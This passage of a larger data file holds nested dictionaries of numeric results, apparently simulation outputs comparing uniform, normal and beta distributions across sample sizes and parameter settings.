0.16069418726755758, 'beta4': 0.07050071410282907}, 300: {'uni': 0.0997903074389076, 'nor': 0.1434928646404363, 'beta1': 0.09987792658944261, 'beta2': 0.1712581767153427, 'beta4': 0.08388928555633074}, 200: {'uni': 0.1229636584423498, 'nor': 0.16127335693854156, 'beta1': 0.12179318587940297, 'beta2': 0.18650787549305375, 'beta4': 0.10364099823577061}, 150: {'uni': 0.13950034070955347, 'nor': 0.17459656922463157, 'beta1': 0.13855391323541408, 'beta2': 0.19837515491552643, 'beta4': 0.12275345243127289}, 100: {'uni': 0.1721101997017661, 'nor': 0.20046992755603654, 'beta1': 0.17021665164027383, 'beta2': 0.22211280446894255, 'beta4': 0.15546389829003454}, 75: {'uni': 0.1991174934620939, 'nor': 0.22331372517586023, 'beta1': 0.1962104983206956, 'beta2': 0.24060724420863722, 'beta4': 0.17937743495141684}, 50: {'uni': 0.23946193200510502, 'nor': 0.25716770411393886, 'beta1': 0.2418907692375714, 'beta2': 0.27698760128146055, 'beta4': 0.22462197378366977}, 30: {'uni': 0.3048167499504834, 'nor': 0.3224164981392731, 'beta1': 0.30917669628791133, 'beta2': 0.3397217885796864, 'beta4': 0.2951530259916931}, 20: {'uni': 0.3730336363648902, 'nor': 0.392045571478165, 'beta1': 0.37260044052109287, 'beta2': 0.3959432577708598, 'beta4': 0.36505805948899306}, 10: {'uni': 0.5205895094295567, 'nor': 0.5200665477634308, 'beta1': 0.5169539616971102, 'beta2': 0.5378667745281579, 'beta4': 0.5122123299658353}}, 100: {1000: {'uni': 0.054671905903051154, 'nor': 0.13620477958130078, 'beta1': 0.054448380411697084, 'beta2': 0.156407609946504, 'beta4': 0.04258031568291154}, 750: {'uni': 0.06266207206914232, 'nor': 0.13888439278405296, 'beta1': 0.06271791632667584, 'beta2': 0.16566678573632287, 'beta4': 0.0482925234291825}, 500: {'uni': 0.0775012675871265, 'nor': 0.14584060351193762, 'beta1': 0.07690888604663815, 'beta2': 0.16862882144382407, 'beta4': 0.06119566013646921}, 400: {'uni': 0.08612080986238169, 'nor': 0.1524884087949958, 'beta1': 0.08594295867668089, 'beta2': 0.17546187004121272, 'beta4': 0.06890296067565604}, 300: {'uni': 0.09914477687385226, 'nor': 0.16047382364230972, 'beta1': 0.09975824624614843, 'beta2': 0.18295548537415873, 'beta4': 0.08159044925727432}, 200: {'uni': 0.12159165562809493, 'nor': 0.1749465483291479, 'beta1': 0.12382445050344149, 'beta2': 0.19490495485248804, 'beta4': 0.10001305394379784}, 150: {'uni': 0.14077933594023823, 'nor': 0.18899798332431184, 'beta1': 0.1392565038337702, 'beta2': 0.20870351777500962, 'beta4': 0.1201824703566371}, 100: {'uni': 0.17056823279090622, 'nor': 0.21428849869387473, 'beta1': 0.1691699130978257, 'beta2': 0.23043861580390712, 'beta4': 0.1516000664543985}, 75: {'uni': 0.19663636725395228, 'nor': 0.2363567433663108, 'beta1': 0.19691891448710852, 'beta2': 0.2503172522739228, 'beta4': 0.17491986059664721}, 50: {'uni': 0.23826972176926864, 'nor': 0.27685077279441733, 'beta1': 0.23825989017305044, 'beta2': 0.2868672428900947, 'beta4': 0.21882117630157366}, 30: {'uni': 0.31201675069446144, 'nor': 0.3343598643931398, 'beta1': 0.3060809831180182, 'beta2': 0.3440276319271851, 'beta4': 0.29233201067867287}, 20: {'uni': 0.3759351158966905, 'nor': 0.398490239918883, 'beta1': 0.38101245327903976, 'beta2': 0.39923128747203945, 'beta4': 0.3603116968657404}, 10: {'uni': 0.5196174604512347, 'nor': 0.5370629326824977, 'beta1': 0.5227401105260507, 'beta2': 0.5353245869799641, 'beta4': 0.5038900663854036}}, 75: {1000: {'uni': 0.05581476206336089, 'nor': 0.14996311847318278, 'beta1': 0.05365675549099019, 'beta2': 0.17055018709179848, 'beta4': 0.04193211124195961}, 750: {'uni': 0.06309942452483619, 'nor': 0.15522283922657953, 'beta1': 0.06265439072142831, 'beta2': 0.17240879861617764, 'beta4': 0.048386543332347154}, 500: {'uni': 0.07754087582450486, 'nor': 0.16332486956676168, 'beta1': 0.07743582625568735, 'beta2': 0.17781956208843652, 'beta4': 0.059938160945287436}, 400: {'uni': 0.0859009285413197, 'nor': 0.16455528208539544, 'beta1': 0.0859009551340934, 'beta2': 0.18121441364820234, 'beta4': 0.06915251664696331}, 300: {'uni': 0.09986347174843568, 'nor': 0.1761029972514011, 'beta1': 0.0985448164318779, 'beta2': 0.19063671853439235, 'beta4': 0.07940996126345179}, 200: {'uni': 0.1219446322586436, 'nor': 0.19088686764778073, 'beta1': 0.12203985328563413, 'beta2': 0.20221466589744463, 'beta4': 0.09911706486857708}, 150: {'uni': 0.14134327292980867, 'nor': 0.2075824873820286, 'beta1': 0.13918231909157353, 'beta2': 0.21544497996445033, 'beta4': 0.11793244074486325}, 100: {'uni': 0.1687636072286217, 'nor': 0.22966914010762518, 'beta1': 0.17145469012205217, 'beta2': 0.2386137561260998, 'beta4': 0.14523799945462573}, 75: {'uni': 0.19703843729601045, 'nor': 0.2452280144193495, 'beta1': 0.19774506037472683, 'beta2': 0.2578913259496163, 'beta4': 0.17331141348235535}, 50: {'uni': 0.23561918913475827, 'nor': 0.28225307485813256, 'beta1': 0.23938641208932598, 'beta2': 0.2860719183825794, 'beta4': 0.2152316198436074}, 30: {'uni': 0.3063193649262127, 'nor': 0.3405329572940864, 'beta1': 0.30716509640473844, 'beta2': 0.34335563947301895, 'beta4': 0.28587386510907925}, 20: {'uni': 0.3767551692150056, 'nor': 0.4031495423576498, 'beta1': 0.37352751762215214, 'beta2': 0.4017493254898249, 'beta4': 0.351543039258803}, 10: {'uni': 0.5135684852674217, 'nor': 0.5436208094855315, 'beta1': 0.5192701884000489, 'beta2': 0.541210448929448, 'beta4': 0.5038013131913337}}, 50: {1000: {'uni': 0.057842757890233965, 'nor': 0.176724096627361, 'beta1': 0.05408363038722486, 'beta2': 0.1893425096945247, 'beta4': 0.04177685643849072}, 750: {'uni': 0.06538542437484401, 'nor': 0.18526810074262368, 'beta1': 0.06262861062085978, 'beta2': 0.19081050404679278, 'beta4': 0.048138028850044035}, 500: {'uni': 0.0792274657176204, 'nor': 0.19075398241126212, 'beta1': 0.0781712308607096, 'beta2': 0.19703705491038603, 'beta4': 0.0588888677259701}, 400: {'uni': 0.08735181776995748, 'nor': 0.19733138997918653, 'beta1': 0.08671034907348185, 'beta2': 0.2029356394631182, 'beta4': 0.066356031342088}, 300: {'uni': 0.10038917910081224, 'nor': 0.2029037006087926, 'beta1': 0.09984458469801827, 'beta2': 0.2063407376940214, 'beta4': 0.07823225938947853}, 200: {'uni': 0.12225034725079975, 'nor': 0.21748256503914343, 'beta1': 0.12127009856496679, 'beta2': 0.21298920413518108, 'beta4': 0.09725242174322574}, 150: {'uni': 0.13784882603896337, 'nor': 0.2249234497071243, 'beta1': 0.142780623344778, 'beta2': 0.22771126781508755, 'beta4': 0.11232814682225023}, 100: {'uni': 0.1714971001027576, 'nor': 0.25130430723045216, 'beta1': 0.17149311831470596, 'beta2': 0.24575615134422085, 'beta4': 0.14352315798485257}, 75: {'uni': 0.19880624921564277, 'nor': 0.26882383206094734, 'beta1': 0.19913517567203842, 'beta2': 0.26323216252272097, 'beta4': 0.16694848958957278}, 50: {'uni': 0.24301893705195066, 'nor': 0.30053473330563535, 'beta1': 0.2437319298178, 'beta2': 0.2954722207006947, 'beta4': 0.21057399371569013}, 30: {'uni': 0.3061807816995066, 'nor': 0.3627984661916076, 'beta1': 0.30909416778391374, 'beta2': 0.35432147654309276, 'beta4': 0.28138283811427534}, 20: {'uni': 0.3762292155636904, 'nor': 0.4143457355174486, 'beta1': 0.37003582598685447, 'beta2': 0.417463947271284, 'beta4': 0.35099161339155716}, 10: {'uni': 0.5146354857060667, 'nor': 0.5544668904963077, 'beta1': 0.5140864742286797, 'beta2': 0.5502638339716877, 'beta4': 0.5028168394982335}}, 30: {1000: {'uni': 0.06167755027974642, 'nor': 0.23144501325358247, 'beta1': 0.05443549286004057, 'beta2': 0.21030902628970505, 'beta4': 0.04112353109993838}, 750: {'uni': 0.06986464831340056, 'nor': 0.23157834653825105, 'beta1': 0.06298033424844018, 'beta2': 0.216023883145685, 'beta4': 0.04803956198514081}, 500: {'uni': 0.08291783316058687, 'nor': 0.23718889406318566, 'beta1': 0.07704332442547329, 'beta2': 0.21732439854980712, 'beta4': 0.059507078517589906}, 400: {'uni': 0.09066454957494724, 'nor': 0.24292620517074537, 'beta1': 0.08498286362579072, 'beta2': 0.22266027695887336, 'beta4': 0.06609086320354882}, 300: {'uni': 0.10418406038463879, 'nor': 0.2475908290265445, 'beta1': 0.10110680990030668, 'beta2': 0.2275142158690745, 'beta4': 0.07602884420540873}, 200: {'uni': 0.12340725206644898, 'nor': 0.2577901680164382, 'beta1': 0.12378156154379666, 'beta2': 0.23814817788828757, 'beta4': 0.0942162762280091}, 150: {'uni': 0.14201468529779537, 'nor': 0.2714996335714514, 'beta1': 0.14041437088952297, 'beta2': 0.24705628359301424, 'beta4': 0.1115326221157299}, 100: {'uni': 0.17156911043689577, 'nor': 0.2910591493981809, 'beta1': 0.17229628287565757, 'beta2': 0.26827556800042573, 'beta4': 0.1379958628810278}, 75: {'uni': 0.19484440138573444, 'nor': 0.30551022793589416, 'beta1': 0.19665653140894246, 'beta2': 0.2834507380462248, 'beta4': 0.16309095353377234}, 50: {'uni': 0.2410672107187225, 'nor': 0.33499572655115767, 'beta1': 0.24405909195603415, 'beta2': 0.31230260400439824, 'beta4': 0.2051899383337094}, 30: {'uni': 0.30479652249512135, 'nor': 0.38800092181160023, 'beta1': 0.30744408184030536, 'beta2': 0.3593455522789838, 'beta4': 0.27314032884799155}, 20: {'uni': 0.37449454977510127, 'nor': 0.4460662326088321, 'beta1': 0.3700752962830209, 'beta2': 0.4167874835239967, 'beta4': 0.3384436437562991}, 10: {'uni': 0.5116314558801505, 'nor': 0.5755223794724841, 'beta1': 0.5150076058914129, 'beta2': 0.5514563941928305, 'beta4': 0.4917892863434117}}, 20: {1000: {'uni': 0.06959685300772211, 'nor': 0.28757410567549513, 'beta1': 0.053953981515175053, 'beta2': 0.23479744605814812, 'beta4': 0.04068104631305974}, 750: {'uni': 0.07583228548956522, 'nor': 0.2893885231958583, 'beta1': 0.06269020138133452, 'beta2': 0.2398017512195938, 'beta4': 0.0477206084818706}, 500: {'uni': 0.08760381160767208, 'nor': 0.2873807845879558, 'beta1': 0.07722766319523955, 'beta2': 0.24182381981064882, 'beta4': 0.05857000112490568}, 400: {'uni': 0.09700627334635992, 'nor': 0.2945018063796199, 'beta1': 0.08605947968141531, 'beta2': 0.2454067726287148, 'beta4': 0.0658297775312253}, 300: {'uni': 0.10812260594449896, 'nor': 0.3044832061482207, 'beta1': 0.09982313247817287, 'beta2': 0.25311285877382617, 'beta4': 0.07470120923689594}, 200: {'uni': 0.13067538774601684, 'nor': 0.307381114817036, 'beta1': 0.1207002057565804, 'beta2': 0.26262764232583313, 'beta4': 0.09381753824822037}, 150: {'uni': 0.1437519246686677, 'nor': 0.3206091659846585, 'beta1': 0.13867393280816304, 'beta2': 0.265394034224661, 'beta4': 0.10931783353586122}, 100: {'uni': 0.17189740592688724, 'nor': 0.3280544098249214, 'beta1': 0.16810853258661185, 'beta2': 0.2803147606488574, 'beta4': 0.13269638171126513}, 75: {'uni': 0.2003549991132838, 'nor': 0.34489520732083756, 'beta1': 0.19657825911151428, 'beta2': 0.29584161685011867, 'beta4': 0.15555948793153623}, 50: {'uni': 0.24046928357188047, 'nor': 0.3831682316031932, 'beta1': 0.24031547155678468, 'beta2': 0.3259770855267306, 'beta4': 0.19629711424440732}, 30: {'uni': 0.3080680301232709, 'nor': 0.42303226265926963, 'beta1': 0.30509121084648144, 'beta2': 0.37610727416155765, 'beta4': 0.2609876476177542}, 20: {'uni': 0.373297668166573, 'nor': 0.475814762443992, 'beta1': 0.3757648466315679, 'beta2': 0.42264940499356346, 'beta4': 0.3284256078618326}, 10: {'uni': 0.5140039283349758, 'nor': 0.5950313110777266, 'beta1': 0.5170351561226657, 'beta2': 0.555063447840049, 'beta4': 0.473618190051116}}, 10: {1000: {'uni': 0.1000131525742068, 'nor': 0.409864047721089, 'beta1': 0.09113480290581626, 'beta2': 0.2804979904810423, 'beta4': 0.04087846848948132}, 750: {'uni': 0.10360258940868095, 'nor': 0.41929372322534414, 'beta1': 0.09114741734335415, 'beta2': 0.28114038955842613, 'beta4': 0.0477679066813847}, 500: {'uni': 0.11195961020305714, 'nor': 0.4157829085773251, 'beta1': 0.09126098733586951, 'beta2': 0.28657849318925166, 'beta4': 0.058399050643070494}, 400: {'uni': 0.11729638239795848, 'nor': 0.4260504597395027, 'beta1': 0.09154740289766372, 'beta2': 0.28504911455818494, 'beta4': 0.06534589576597083}, 300: {'uni': 0.12830729394341506, 'nor': 0.4205120474737974, 'beta1': 0.10096554208890152, 'beta2': 0.2936910855153506, 'beta4': 0.075492287165148}, 200: {'uni': 0.14515187402988394, 'nor': 0.435914384534595, 'beta1': 0.12215037845816623, 'beta2': 0.2981966625105821, 'beta4': 0.09167242348680918}, 150: {'uni': 0.15934251639018754, 'nor': 0.4395473221709565, 'beta1': 0.14085779880718263, 'beta2': 0.31177123240394505, 'beta4': 0.10719443660940275}, 100: {'uni': 0.18512635552666046, 'nor': 0.4563048193604518, 'beta1': 0.16884027642286348, 'beta2': 0.3151628444983027, 'beta4': 0.12974440442356955}, 75: {'uni': 0.2071031402154928, 'nor': 0.46661064860968665, 'beta1': 0.19804032027111418, 'beta2': 0.33533567264141617, 'beta4': 0.15103905584519184}, 50: {'uni': 0.24733757785161503, 'nor': 0.48136759185068323, 'beta1': 0.2403341444387983, 'beta2': 0.3594046504015401, 'beta4': 0.1890136163469433}, 30: {'uni': 0.3069533690198551, 'nor': 0.5223418943718963, 'beta1': 0.30599677039266915, 'beta2': 0.3983639241051619, 'beta4': 0.2534266062192869}, 20: {'uni': 0.3735600858621225, 'nor': 0.5590331645199271, 'beta1': 0.3745545851840409, 'beta2': 0.44871940334430627, 'beta4': 0.309129001754901}, 10: {'uni': 0.5079603855850016, 'nor': 0.6714692142813454, 'beta1': 0.5137289273763032, 'beta2': 0.5696425643135812, 'beta4': 0.45864540314219915}}}, 0.01: {1000: {1000: {'uni': 0.05129485367689102, 'nor': 0.06281083509171664, 'beta1': 0.05107806686939176, 'beta2': 0.10147434204599137, 'beta4': 0.04481834422995701}, 750: {'uni': 0.05933719566503981, 'nor': 0.07044954783713647, 'beta1': 0.05907830933987235, 'beta2': 0.10443582378448724, 'beta4': 0.05337370850693279}, 500: {'uni': 0.07297584959697972, 'nor': 0.08154345761298731, 'beta1': 0.07271983245642422, 'beta2': 0.11266519507619366, 'beta4': 0.06585853402432429}, 400: {'uni': 0.08090786389591842, 'nor': 0.08992168016454061, 'beta1': 0.08128421415396725, 'beta2': 0.11609404475794888, 'beta4': 0.07649643394160888}, 300: {'uni': 0.09388546103833217, 'nor': 0.09955321885077567, 'beta1': 0.09345709665753016, 'beta2': 0.12649006695142406, 'beta4': 0.08841359390615178}, 200: {'uni': 0.11353626166629766, 'nor': 0.12048393062982926, 'beta1': 0.11474986795545838, 'beta2': 0.14179352445516558, 'beta4': 0.10994312621177804}, 150: {'uni': 0.1327942158900352, 'nor': 0.13672326054920736, 'beta1': 0.13088297498674817, 'beta2': 0.15495612418375992, 'beta4': 0.12759146981003233}, 100: {'uni': 0.16208800134443502, 'nor': 0.1634608738492047, 'beta1': 0.16483383061835577, 'beta2': 0.179293345468783, 'beta4': 0.15587772291645302}, 75: {'uni': 0.18573927578217658, 'nor': 0.18826509813153808, 'beta1': 0.18535362149382184, 'beta2': 0.20246761284986203, 'beta4': 0.18363587582052376}, 50: {'uni': 0.22602880452129426, 'nor': 0.22721053058692026, 'beta1': 0.22647423560537766, 'beta2': 0.24132302056400629, 'beta4': 0.22214505424144632}, 30: {'uni': 0.2866957560674456, 'nor': 0.29122835505552935, 'beta1': 0.2929636790178528, 'beta2': 0.30200243653413883, 'beta4': 0.2919094262056585}, 20: {'uni': 0.35528611293244305, 'nor': 0.35294865538334086, 'beta1': 0.35330451666561385, 'beta2': 0.3561690331631435, 'beta4': 0.3471108536518231}, 10: {'uni': 0.4898429521852865, 'nor': 0.48995064698146334, 'beta1': 0.4916404496017533, 'beta2': 0.49434298684781663, 'beta4': 0.48152800061187356}}, 750: {1000: {'uni': 0.051534656619642405, 'nor': 0.06661040036430238, 'beta1': 0.05119210087714571, 'beta2': 0.1017170167766821, 'beta4': 0.04405968156885359}, 750: {'uni': 0.059392840143921544, 'nor': 0.07295941378208323, 'beta1': 0.0593079696092893, 'beta2': 0.10498534334941645, 'beta4': 0.05213727865509954}, 500: {'uni': 0.07232105894578911, 'nor': 0.0845454668484768, 'beta1': 0.07269799849643532, 'beta2': 0.1124804653100443, 'beta4': 0.06550213106063163}, 400: {'uni': 0.08051435061250778, 'nor': 0.09174262237208586, 'beta1': 0.0814260013663316, 'beta2': 0.11733914354575858, 'beta4': 0.07417771351439317}, 300: {'uni': 0.09264055215696232, 'nor': 0.10295017205097534, 'beta1': 0.09346566052436689, 'beta2': 0.12655756797177392, 'beta4': 0.08787578197242896}, 200: {'uni': 0.11483671598870576, 'nor': 0.12366825601571851, 'beta1': 0.11322629942862356, 'beta2': 0.14042506799186272, 'beta4': 0.10722297353789534}, 150: {'uni': 0.13158644004287812, 'nor': 0.1389969192433652, 'beta1': 0.13055409411440705, 'beta2': 0.15647066832130707, 'beta4': 0.12705846586847036}, 100: {'uni': 0.16186652500083287, 'nor': 0.1673332759029187, 'beta1': 0.16128287338366937, 'beta2': 0.18038226627656384, 'beta4': 0.15611827317289068}, 75: {'uni': 0.18764543571574965, 'nor': 0.19095691792223274, 'beta1': 0.18794282479122293, 'beta2': 0.20449321398176196, 'beta4': 0.18061820709529477}, 50: {'uni': 0.226171463050115, 'nor': 0.2289935327391464, 'beta1': 0.22801373082023235, 'beta2': 0.24150428904957089, 'beta4': 0.22665004770368552}, 30: {'uni': 0.28965332928325704, 'nor': 0.29481852702352496, 'beta1': 0.29443285351219906, 'beta2': 0.30448017108169273, 'beta4': 0.2841177753703454}, 20: {'uni': 0.35303732347834804, 'nor': 0.35175872269014363, 'beta1': 0.3488588172685543, 'beta2': 0.36473759502844405, 'beta4': 0.3489149265132695}, 10: {'uni': 0.48746885638524173, 'nor': 0.48910846637687666, 'beta1': 0.4854441287384354, 'beta2': 0.499312939413207, 'beta4': 0.4820854775286469}}, 500: {1000: {'uni': 0.05070668798111183, 'nor': 0.07307564348735107, 'beta1': 0.05136358571645222, 'beta2': 0.10754414306745141, 'beta4': 0.04335466469142435}, 750: {'uni': 0.05930859802961075, 'nor': 0.07913755555471735, 'beta1': 0.058713049033531806, 'beta2': 0.11202765188630714, 'beta4': 0.05072594836982958}, 500: {'uni': 0.07250391695991487, 'nor': 0.08997714013244151, 'beta1': 0.07217245096062674, 'beta2': 0.11976047636593312, 'beta4': 0.06369794357960606}, 400: {'uni': 0.08087401871675737, 'nor': 0.09762299221558252, 'beta1': 0.08126385640568756, 'beta2': 0.12524922843485486, 'beta4': 0.07246464421624788}, 300: {'uni': 0.09286272646331206, 'nor': 0.10639090401076873, 'beta1': 0.09360831758476895, 'beta2': 0.13480385220989233, 'beta4': 0.08484641064573195}, 200: {'uni': 0.11369861261647718, 'nor': 0.1259649259062341, 'beta1': 0.11535049725347946, 'beta2': 0.15023672569159274, 'beta4': 0.10654459673560468}, 150: {'uni': 0.13094331807012105, 'nor': 0.1419771822231538, 'beta1': 0.13242263806323107, 'beta2': 0.16312614939587444, 'beta4': 0.12204776890498104}, 100: {'uni': 0.16010520707772924, 'nor': 0.16829119335024995, 'beta1': 0.161780824516852, 'beta2': 0.1845635350197833, 'beta4': 0.15500764249014892}, 75: {'uni': 0.18569722037995617, 'nor': 0.19404858222754012, 'beta1': 0.18353587169284724, 'beta2': 0.21024744989486982, 'beta4': 0.18093047276834628}, 50: {'uni': 0.2249952534487163, 'nor': 0.23470807584810854, 'beta1': 0.22394207853083203, 'beta2': 0.24369571318319788, 'beta4': 0.22404400464903013}, 30: {'uni': 0.28922639988339793, 'nor': 0.29694440849160253, 'beta1': 0.28930513852142603, 'beta2': 0.3061086815618318, 'beta4': 0.28197149415512585}, 20: {'uni': 0.3532159395936194, 'nor': 0.3594610656143175, 'beta1': 0.35424253066365413, 'beta2': 0.3629738556479084, 'beta4': 0.34892709778660913}, 10: {'uni': 0.49319776417333205, 'nor': 0.4919346045056977, 'beta1': 0.4914053992328329, 'beta2': 0.4956418018212609, 'beta4': 0.48866367027428953}}, 400: {1000: {'uni': 0.05171872696982288, 'nor': 0.0779968485408219, 'beta1': 0.05125234103750187, 'beta2': 0.10749424790797857, 'beta4': 0.04243112506333324}, 750: {'uni': 0.05942664915165613, 'nor': 0.08278471622725792, 'beta1': 0.059045226639506954, 'beta2': 0.11246496346057688, 'beta4': 0.049669130629863556}, 500: {'uni': 0.07189692356904676, 'nor': 0.09361598801023086, 'beta1': 0.0721804928498383, 'beta2': 0.11937872756887818, 'beta4': 0.06327011110935565}, 400: {'uni': 0.08084614058304584, 'nor': 0.10080942415469252, 'beta1': 0.0797135489432822, 'beta2': 0.1257152874686207, 'beta4': 0.07054543139847541}, 300: {'uni': 0.09394710441562093, 'nor': 0.10983774809278396, 'beta1': 0.09317847768978005, 'beta2': 0.13400641076171205, 'beta4': 0.08372788015883226}, 200: {'uni': 0.11516939973345491, 'nor': 0.1279698675017119, 'beta1': 0.11283277809965603, 'beta2': 0.14878256141575052, 'beta4': 0.10481300302685173}, 150: {'uni': 0.13103481700869724, 'nor': 0.14459734582575978, 'beta1': 0.13109809480602197, 'beta2': 0.1634096298903665, 'beta4': 0.1224780784738968}, 100: {'uni': 0.1610805901347358, 'nor': 0.16904015329738042, 'beta1': 0.1602232613963524, 'beta2': 0.1874426452084551, 'beta4': 0.15348776308096057}, 75: {'uni': 0.18177371768073364, 'nor': 0.19670702076359703, 'beta1': 0.1844925024391989, 'beta2': 0.2105191447384148, 'beta4': 0.17783506013311623}, 50: {'uni': 0.2252328815143954, 'nor': 0.231721726836716, 'beta1': 0.22366230144945903, 'beta2': 0.24781167529857046, 'beta4': 0.21942405296052814}, 30: {'uni': 0.28864743546145355, 'nor': 0.2970598210895456, 'beta1': 0.2893646586257687, 'beta2': 0.30151561161895035, 'beta4': 0.2852000453369167}, 20: {'uni': 0.3560880816420639, 'nor': 0.35816852147038125, 'beta1': 0.3587921441788674, 'beta2': 0.3713605213188108, 'beta4': 0.3507319434269337}, 10: {'uni': 0.48715561247362865, 'nor': 0.491578769317442, 'beta1': 0.4763429028968493, 'beta2': 0.5009132622576649, 'beta4': 0.4858863544709412}}, 300: {1000: {'uni': 0.05116236960288739, 'nor': 0.08362687693280035, 'beta1': 0.051368373495024544, 'beta2': 0.11446474352863178, 'beta4': 0.04119784019711356}, 750: {'uni': 0.05993893748144197, 'nor': 0.088975002045106, 'beta1': 0.05945536094744841, 'beta2': 0.1192867892763042, 'beta4': 0.04845162600368419}, 500: {'uni': 0.07274728302306016, 'nor': 0.09828413734395919, 'beta1': 0.07212817693643503, 'beta2': 0.12627777617615477, 'beta4': 0.06160395430770016}, 400: {'uni': 0.08073474547539339, 'nor': 0.10507281592449369, 'beta1': 0.08024944641722576, 'beta2': 0.1303092084298162, 'beta4': 0.06982921110804863}, 300: {'uni': 0.09317526758440403, 'nor': 0.11705090342781177, 'beta1': 0.09315546513078332, 'beta2': 0.1399551702427777, 'beta4': 0.08158816157237775}, 200: {'uni': 0.11409958755150595, 'nor': 0.1314488095008084, 'beta1': 0.11453286833437615, 'beta2': 0.1567790320303898, 'beta4': 0.10362462756693636}, 150: {'uni': 0.130936819362498, 'nor': 0.1493233271345169, 'beta1': 0.13150912092144829, 'beta2': 0.169701096896674, 'beta4': 0.12193228046643229}, 100: {'uni': 0.16243451017422467, 'nor': 0.1757607427080965, 'beta1': 0.160383901558243, 'beta2': 0.19244715618473562, 'beta4': 0.1514647915916582}, 75: {'uni': 0.1853859134119128, 'nor': 0.1958997856947285, 'beta1': 0.18687394388066536, 'beta2': 0.21186212806019417, 'beta4': 0.17618375652600887}, 50: {'uni': 0.22498609458966784, 'nor': 0.23730546516440537, 'beta1': 0.22564497853587992, 'beta2': 0.25068612614680547, 'beta4': 0.22025976236280248}, 30: {'uni': 0.2883890795435333, 'nor': 0.29983573055446033, 'beta1': 0.2921073149317487, 'beta2': 0.3082785804677224, 'beta4': 0.28437957017383403}, 20: {'uni': 0.350662368824897, 'nor': 0.36066581276090837, 'beta1': 0.35036112927618646, 'beta2': 0.36698531659291206, 'beta4': 0.34399861518395175}, 10: {'uni': 0.48773425736194487, 'nor': 0.4897587539768351, 'beta1': 0.48597353289535955, 'beta2': 0.5016469184252377, 'beta4': 0.48930033694496555}}, 200: {1000: {'uni': 0.05099550061354963, 'nor': 0.09621002435011294, 'beta1': 0.05097248744906935, 'beta2': 0.1270148971959001, 'beta4': 0.04066696015503554}, 750: {'uni': 0.05897057501846892, 'nor': 0.10125250087843168, 'beta1': 0.05929595778075081, 'beta2': 0.13114280729155686, 'beta4': 0.04768802094469193}, 500: {'uni': 0.07196269990769555, 'nor': 0.10929050520651495, 'beta1': 0.07283579022785935, 'beta2': 0.13763586545366968, 'beta4': 0.060027142657854}, 400: {'uni': 0.08054788114980349, 'nor': 0.11648685006536474, 'beta1': 0.0811659726275793, 'beta2': 0.14360472688257275, 'beta4': 0.06804198089690716}, 300: {'uni': 0.09360446147057411, 'nor': 0.12347797475561295, 'beta1': 0.09391365693051856, 'beta2': 0.15084726685668082, 'beta4': 0.07971992088255381}, 200: {'uni': 0.11420590046780266, 'nor': 0.13996925144507733, 'beta1': 0.11318748651513358, 'beta2': 0.1649173148462807, 'beta4': 0.10100464440514964}, 150: {'uni': 0.13159721869668134, 'nor': 0.15543417245376623, 'beta1': 0.1306662632283953, 'beta2': 0.17863248019784544, 'beta4': 0.11926356604886618}, 100: {'uni': 0.1616085474743723, 'nor': 0.18126496559108407, 'beta1': 0.16180591430502922, 'beta2': 0.20079768282663685, 'beta4': 0.14662232668007058}, 75: {'uni': 0.18466397256542888, 'nor': 0.20167396401497723, 'beta1': 0.18454565366419512, 'beta2': 0.22144937952843802, 'beta4': 0.1723673372282205}, 50: {'uni': 0.22429367090067337, 'nor': 0.2421981518299573, 'beta1': 0.22627305994598435, 'beta2': 0.25417001184524735, 'beta4': 0.21615315140042368}, 30: {'uni': 0.2891984285711773, 'nor': 0.3022022225666101, 'beta1': 0.2885857727546917, 'beta2': 0.31488071890675523, 'beta4': 0.27946891056788803}, 20: {'uni': 0.35272562205198627, 'nor': 0.3597248755608644, 'beta1': 0.34988508357633813, 'beta2': 0.37359776285196444, 'beta4': 0.3452123858638153}, 10: {'uni': 0.4934504641167673, 'nor': 0.4953893325003678, 'beta1': 0.49326648601757545, 'beta2': 0.5048531792897072, 'beta4': 0.48425541230404723}}, 150: {1000: {'uni': 0.051578990681795306, 'nor': 0.10587724278324923, 'beta1': 0.05100434131700521, 'beta2': 0.1385651893710681, 'beta4': 0.040131066622810074}, 750: {'uni': 0.05964212868791385, 'nor': 0.11070421199591629, 'beta1': 0.058951783674372704, 'beta2': 0.1401604284675425, 'beta4': 0.04709391177274086}, 500: {'uni': 0.07278161439913988, 'nor': 0.12078841684699831, 'beta1': 0.07292441980479603, 'beta2': 0.14450764888197143, 'beta4': 0.058999750381320826}, 400: {'uni': 0.08088169280004709, 'nor': 0.12433378065418932, 'beta1': 0.08132095020607566, 'beta2': 0.15222740175561678, 'beta4': 0.06647480909025247}, 300: {'uni': 0.0939218287454483, 'nor': 0.13477079040381174, 'beta1': 0.09374450977190885, 'beta2': 0.15925231238657545, 'beta4': 0.07809357504147704}, 200: {'uni': 0.11376771084448467, 'nor': 0.14849656103329123, 'beta1': 0.11448673216899263, 'beta2': 0.17267349109969787, 'beta4': 0.09768020272133693}, 150: {'uni': 0.13248417636554644, 'nor': 0.16487086808018317, 'beta1': 0.13201540731601635, 'beta2': 0.18463196235548684, 'beta4': 0.11564332215144385}, 100: {'uni': 0.15986880516145718, 'nor': 0.18568769522330097, 'beta1': 0.16083695049744096, 'beta2': 0.20763142518129513, 'beta4': 0.14518253285735372}, 75: {'uni': 0.18453989535605683, 'nor': 0.20888765477064086, 'beta1': 0.18449616472594121, 'beta2': 0.2273477267710795, 'beta4': 0.1717298602845287}, 50: {'uni': 0.225005258500509, 'nor': 0.2457096370841649, 'beta1': 0.2261275447013404, 'beta2': 0.2614753286995815, 'beta4': 0.21363887611658533}, 30: {'uni': 0.2895467650368521, 'nor': 0.30561459985547096, 'beta1': 0.28870673052245394, 'beta2': 0.3182687898914055, 'beta4': 0.2785792145404429}, 20: {'uni': 0.3510013380043752, 'nor': 0.3689369050495814, 'beta1': 0.35376596345288086, 'beta2': 0.3753745534011983, 'beta4': 0.34145606872993056}, 10: {'uni': 0.4879912533176197, 'nor': 0.49642038735952065, 'beta1': 0.48769549189795697, 'beta2': 0.5050788225647467, 'beta4': 0.4785566786480819}}, 100: {1000: {'uni': 0.05191039332270719, 'nor': 0.1245351360241278, 'beta1': 0.050997006206302875, 'beta2': 0.1460504259615869, 'beta4': 0.039905064803095525}, 750: {'uni': 0.05998871346519452, 'nor': 0.1294606683925581, 'beta1': 0.05847700732727823, 'beta2': 0.15021805913043595, 'beta4': 0.04601974795368319}, 500: {'uni': 0.07341973515609257, 'nor': 0.13531370556475342, 'beta1': 0.07268776551364053, 'beta2': 0.15390577989276166, 'beta4': 0.05694920670041542}, 400: {'uni': 0.08067103236103346, 'nor': 0.14321047014928123, 'beta1': 0.08067289579950143, 'beta2': 0.15985350854382507, 'beta4': 0.06537605030613047}, 300: 